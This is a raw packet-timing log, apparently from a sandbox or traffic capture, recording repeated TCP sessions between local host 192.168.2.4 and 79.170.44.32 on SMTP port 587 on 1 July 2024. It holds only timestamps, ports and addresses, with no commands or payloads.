                              Jul 1, 2024 20:27:49.233510017 CEST5874974379.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:49.233607054 CEST5874974379.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:49.233634949 CEST5874974379.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:49.233876944 CEST5874974379.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:49.235121012 CEST5874974379.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:49.235148907 CEST5874974379.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:49.235181093 CEST5874974379.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:49.235229969 CEST5874974379.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:49.235281944 CEST5874974379.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:49.235310078 CEST5874974379.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:49.235337973 CEST5874974379.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:49.235368967 CEST5874974379.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:49.235485077 CEST5874974379.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:49.235647917 CEST5874974379.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:49.235675097 CEST5874974379.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:49.235820055 CEST5874974379.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:49.235848904 CEST5874974379.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:49.235898972 CEST5874974379.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:49.235944986 CEST5874974379.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:49.235972881 CEST5874974379.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:49.236021042 CEST5874974379.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:49.236172915 CEST49743587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:49.241169930 CEST5874974379.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:49.831792116 CEST5874974379.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:49.982219934 CEST49743587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:51.809463978 CEST49743587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:51.818121910 CEST5874974379.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:52.205099106 CEST5874974379.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:52.205207109 CEST49743587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:52.205492973 CEST5874974379.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:52.205549002 CEST49743587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:52.206020117 CEST49744587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:52.210128069 CEST5874974379.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:52.211571932 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:52.211646080 CEST49744587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:52.827761889 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:52.827930927 CEST49744587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:52.833019972 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:53.032391071 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:53.032619953 CEST49744587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:53.037683964 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:53.224463940 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:53.224714994 CEST49744587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:53.230003119 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:53.422904015 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:53.423062086 CEST49744587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:53.428704023 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:53.615833044 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:53.615979910 CEST49744587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:53.621403933 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:53.815978050 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:53.816160917 CEST49744587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:53.821546078 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.008660078 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.008877039 CEST49744587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:54.008910894 CEST49744587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:54.008944035 CEST49744587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:54.008981943 CEST49744587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:54.010241032 CEST49744587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:54.013941050 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.013972044 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.013999939 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.014045954 CEST49744587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:54.014513969 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.015460968 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.018759966 CEST49744587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:54.023703098 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.023736000 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.023804903 CEST49744587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:54.023850918 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.023960114 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.024020910 CEST49744587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:54.024032116 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.024060965 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.024087906 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.024116039 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.024130106 CEST49744587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:54.024159908 CEST49744587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:54.029045105 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.029143095 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.029175997 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.029207945 CEST49744587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:54.029237986 CEST49744587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:54.029287100 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.029354095 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.029402971 CEST49744587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:54.029552937 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.029603004 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.029629946 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.029658079 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.029706001 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.029733896 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.029759884 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.029788017 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.034065962 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.034223080 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.034276009 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.034322023 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.034369946 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.034396887 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.034425020 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.034451962 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.034478903 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.034511089 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.034559011 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.034730911 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.034759045 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.034809113 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.034836054 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.034888983 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.034915924 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.034943104 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.034991026 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.035018921 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.035046101 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.035078049 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.627106905 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:54.707302094 CEST49744587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:59.008552074 CEST49744587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:59.013937950 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:59.403178930 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:59.403316975 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:59.403321981 CEST49744587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:59.403362036 CEST49744587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:59.404300928 CEST49745587192.168.2.479.170.44.32
                              Jul 1, 2024 20:27:59.409830093 CEST5874974479.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:59.410723925 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:27:59.410788059 CEST49745587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:00.150458097 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:00.150966883 CEST49745587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:00.156748056 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:00.337574005 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:00.337758064 CEST49745587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:00.342940092 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:00.522360086 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:00.522542000 CEST49745587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:00.527434111 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:00.711060047 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:00.712580919 CEST49745587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:00.719177961 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:00.898240089 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:00.901314974 CEST49745587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:00.906481981 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.095300913 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.095416069 CEST49745587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:01.100302935 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.279144049 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.279424906 CEST49745587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:01.279510021 CEST49745587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:01.279551029 CEST49745587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:01.279624939 CEST49745587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:01.281372070 CEST49745587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:01.284249067 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.284360886 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.284411907 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.284461975 CEST49745587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:01.284504890 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.286277056 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.286350965 CEST49745587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:01.286410093 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.286459923 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.286464930 CEST49745587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:01.286524057 CEST49745587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:01.286525011 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.286582947 CEST49745587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:01.289300919 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.289360046 CEST49745587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:01.292392015 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.292478085 CEST49745587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:01.292931080 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.292979956 CEST49745587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:01.294325113 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.294383049 CEST49745587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:01.294888973 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.294945955 CEST49745587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:01.298408985 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.298489094 CEST49745587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:01.299065113 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.299285889 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.299350977 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.299563885 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.299823999 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.299851894 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.299884081 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.299999952 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.300028086 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.303396940 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.303425074 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.303457022 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.303668976 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.303698063 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.303726912 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.303754091 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.303802013 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.303828955 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.303855896 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.303883076 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.303909063 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.303957939 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.303985119 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.304012060 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.304059029 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.304085970 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.304114103 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.304182053 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.304210901 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.304259062 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.908507109 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:01.957178116 CEST49745587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:13.475375891 CEST49745587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:13.480550051 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:13.862019062 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:13.862204075 CEST49745587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:13.863084078 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:13.863133907 CEST49745587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:13.863205910 CEST49746587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:13.867974997 CEST5874974579.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:13.868052959 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:13.868117094 CEST49746587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:14.490386009 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:14.490833044 CEST49746587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:14.497222900 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:14.685704947 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:14.686976910 CEST49746587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:14.692049980 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:14.880176067 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:14.882946014 CEST49746587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:14.890295982 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.079988956 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.080185890 CEST49746587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:15.085151911 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.275403976 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.275614023 CEST49746587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:15.280714989 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.475378990 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.475521088 CEST49746587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:15.480453968 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.672533035 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.672755957 CEST49746587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:15.672800064 CEST49746587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:15.672815084 CEST49746587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:15.672861099 CEST49746587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:15.674232006 CEST49746587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:15.680047035 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.680161953 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.680171967 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.680181026 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.680236101 CEST49746587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:15.681909084 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.682009935 CEST49746587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:15.687340975 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.687443972 CEST49746587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:15.689270020 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.689332008 CEST49746587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:15.689400911 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.689456940 CEST49746587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:15.689726114 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.689737082 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.689794064 CEST49746587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:15.689852953 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.689862013 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.689871073 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.689946890 CEST49746587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:15.694516897 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.694591045 CEST49746587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:15.694818974 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.694865942 CEST49746587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:15.696664095 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.696717024 CEST49746587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:15.696787119 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.696846962 CEST49746587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:15.697082043 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.697165012 CEST49746587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:15.697220087 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.697230101 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.697261095 CEST49746587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:15.697479010 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.697489023 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.697747946 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.701960087 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.701970100 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.701977968 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.701987028 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.703386068 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.703394890 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.703404903 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.703665018 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.703834057 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.703844070 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.703854084 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.703977108 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.703985929 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.704266071 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.704276085 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.704284906 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.704555035 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.704570055 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.704580069 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.704590082 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.704600096 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.704608917 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.704984903 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.704994917 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.705003977 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.705013037 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.705022097 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.705032110 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.705040932 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.910480022 CEST49746587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:15.915977955 CEST5874974679.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.916033030 CEST49746587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:15.975824118 CEST49747587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:15.981329918 CEST5874974779.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:15.981405020 CEST49747587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:16.601747990 CEST5874974779.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:16.601891994 CEST49747587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:16.606967926 CEST5874974779.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:16.807550907 CEST5874974779.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:16.807796001 CEST49747587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:16.815567017 CEST5874974779.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:16.999671936 CEST5874974779.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:16.999968052 CEST49747587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:17.005498886 CEST5874974779.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:17.196358919 CEST5874974779.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:17.196614981 CEST49747587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:17.201510906 CEST5874974779.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:17.385592937 CEST5874974779.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:17.385744095 CEST49747587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:17.390701056 CEST5874974779.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:17.586522102 CEST5874974779.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:17.586688042 CEST49747587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:17.592452049 CEST5874974779.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:17.781030893 CEST5874974779.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:17.781336069 CEST49747587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:17.781450033 CEST49747587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:17.781471968 CEST49747587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:17.783318996 CEST49747587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:17.786247015 CEST5874974779.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:17.786324024 CEST5874974779.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:17.786336899 CEST5874974779.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:17.788264990 CEST5874974779.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:17.800160885 CEST49747587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:17.805325985 CEST5874974779.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:17.805378914 CEST49747587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:17.805440903 CEST5874974779.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:17.805485964 CEST49747587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:17.806349993 CEST5874974779.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:17.806421041 CEST49747587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:17.810519934 CEST5874974779.170.44.32192.168.2.4
                              Jul 1, 2024 20:28:17.810586929 CEST49747587192.168.2.479.170.44.32
                              Jul 1, 2024 20:28:17.810719967 CEST5874974779.170.44.32192.168.2.4
